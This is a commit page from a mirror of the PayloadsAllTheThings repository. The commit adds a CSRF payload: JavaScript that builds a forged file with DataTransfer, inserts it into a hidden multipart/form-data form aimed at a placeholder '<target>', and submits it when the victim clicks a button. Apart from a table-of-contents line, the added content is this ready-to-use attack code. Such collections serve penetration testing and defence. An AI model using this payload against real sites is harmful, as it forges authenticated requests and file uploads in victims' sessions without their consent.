mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 10:56:10 +00:00
Add multipart/form-data CSRF technique
This commit is contained in:
parent
6650c361e7
commit
b3e6220da6
@ -11,6 +11,7 @@
|
||||
* [HTML GET - No User Interaction)](#html-get---no-user-interaction)
|
||||
* [HTML POST - Requiring User Interaction](#html-post---requiring-user-interaction)
|
||||
* [HTML POST - AutoSubmit - No User Interaction](#html-post---autosubmit---no-user-interaction)
|
||||
* [HTML POST - multipart/form-data with file upload - Requiring User Interaction](#html-post---multipartform-data-with-file-upload---requiring-user-interaction)
|
||||
* [JSON GET - Simple Request](#json-get---simple-request)
|
||||
* [JSON POST - Simple Request](#json-post---simple-request)
|
||||
* [JSON POST - Complex Request](#json-post---complex-request)
|
||||
@ -67,6 +68,27 @@ When you are logged in to a certain site, you typically have a session. The iden
|
||||
</script>
|
||||
```
|
||||
|
||||
### HTML POST - multipart/form-data with file upload - Requiring User Interaction
|
||||
|
||||
```html
|
||||
<script>
|
||||
function launch(){
|
||||
const dT = new DataTransfer();
|
||||
const file = new File( [ "CSRF-filecontent" ], "CSRF-filename" );
|
||||
dT.items.add( file );
|
||||
document.xss[0].files = dT.files;
|
||||
|
||||
document.xss.submit()
|
||||
}
|
||||
</script>
|
||||
|
||||
<form style="display: none" name="xss" method="post" action="<target>" enctype="multipart/form-data">
|
||||
<input id="file" type="file" name="file"/>
|
||||
<input type="submit" name="" value="" size="0" />
|
||||
</form>
|
||||
<button value="button" onclick="launch()">Submit Request</button>
|
||||
```
|
||||
|
||||
|
||||
### JSON GET - Simple Request
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user